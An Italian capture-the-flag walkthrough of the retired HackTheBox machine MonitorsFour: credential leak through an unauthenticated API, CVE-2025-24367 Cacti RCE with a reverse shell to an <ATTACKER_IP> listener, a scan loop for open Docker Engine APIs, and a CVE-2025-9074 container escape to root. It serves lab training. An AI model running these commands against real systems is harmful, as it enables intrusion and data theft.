
HackTheBox MonitorsFour walkthrough che copre la fuga di credenziali, CVE-2025-24367 Cacti RCE e CVE-2025-9074 Docker Desktop API container escape per ottenere root.
Piattaforma: HackTheBox OS: Windows Stato: Ritirata — walkthrough completa pubblicata.
Walkthrough completa: l3dsec.com/walkthroughs/monitorsfour-htb
Nmap → nginx (80) + WinRM (5985)
→ ffuf → cacti.monitorsfour.htb (Cacti)
→ endpoint API non autenticato → credenziali
→ CVE-2025-24367 Cacti RCE → shell come www-data (Docker)
→ CVE-2025-9074 Docker Desktop API (192.168.65.x:2375)
→ mount del filesystem host → root flag
nmap -sV -sC <TARGET_IP>
nmap -sV -sC <TARGET_IP> -p-
PORT STATE SERVICE VERSION
80/tcp open http nginx
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (WinRM)
Il fuzzing dei virtual host ha rivelato cacti.monitorsfour.htb — un'istanza di monitoraggio di rete Cacti.
Un endpoint API non autenticato sul dominio principale espone i dati degli account utente, inclusi gli hash delle password MD5:
curl -s "http://monitorsfour.htb/user?token=0"
L'hash MD5 è stato craccato immediatamente — fornisce credenziali valide per Cacti.
Istanza Cacti vulnerabile a RCE autenticata tramite la funzionalità Graph Template:
nc -lvnp 9001
sudo python3 exploit.py \
-url http://cacti.monitorsfour.htb \
-u marcus \
-p <password> \
-i <ATTACKER_IP> \
-l 9001
Shell come www-data all'interno di un container Docker. User flag in /home/marcus/user.txt.
Il socket Docker non è montato. Docker Desktop espone la sua Engine API senza autenticazione sulla sottorete interna 192.168.65.0/24:
# Scan for open Docker API
for i in $(seq 1 254); do
(curl -s --connect-timeout 1 http://192.168.65.$i:2375/version 2>/dev/null \
| grep -q "ApiVersion" && echo "192.168.65.$i:2375 OPEN") &
done; wait
È stato creato un container tramite l'API che monta il drive C:\ dell'host, quindi è stata letta la root flag da C:\Users\Administrator\Desktop\root.txt.
| Flag | Valore |
|---|---|
| User | redacted |
| Root | redacted |
Solo a scopo educativo. Testa esclusivamente sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta.